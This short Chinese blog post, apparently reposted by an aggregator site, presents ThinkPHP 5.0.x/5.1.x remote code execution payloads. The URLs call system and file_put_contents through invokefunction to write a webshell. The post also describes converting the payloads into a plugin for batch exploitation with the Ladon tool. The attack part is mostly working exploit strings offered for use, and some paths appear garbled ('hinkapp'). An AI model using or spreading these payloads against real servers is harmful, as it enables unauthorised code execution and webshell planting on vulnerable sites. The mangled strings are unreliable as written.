Ladon插件ThinkPHP 5.0.22 5.1.29 GetShell Exploit
Posted K8哥哥
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Ladon插件ThinkPHP 5.0.22 5.1.29 GetShell Exploit相关的知识,希望对你有一定的参考价值。
前言
使用Exp生成器生成Ladon插件实战,Thinkphp GetShell
漏洞环境
使用docker ThinkPHP 5.0.20
复现测试
Payload:
http://192.168.1.37:8080/index.php?s=/Index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
执行命令
写入文件
GetShell1
http://192.168.1.37:8080/index.php?s=/index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo 111111>shell.php
GetShell2
/index.php?s=/index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=URL编码内容
视频教程
通过EXP生成器将以上Payload转成DLL,使用Ladon即可批量利用,详情请观看视频教程
Video: K8Cscan ThinkPHP 5.x RCE Exploit
以上是关于Ladon插件ThinkPHP 5.0.22 5.1.29 GetShell Exploit的主要内容,如果未能解决你的问题,请参考以下文章
ThinkPHP(5.1.x ~ 5.1.31 5.0.x ~ 5.0.23)GetShell漏洞
Ladon插件实战 Weblogic CVE-2018-2894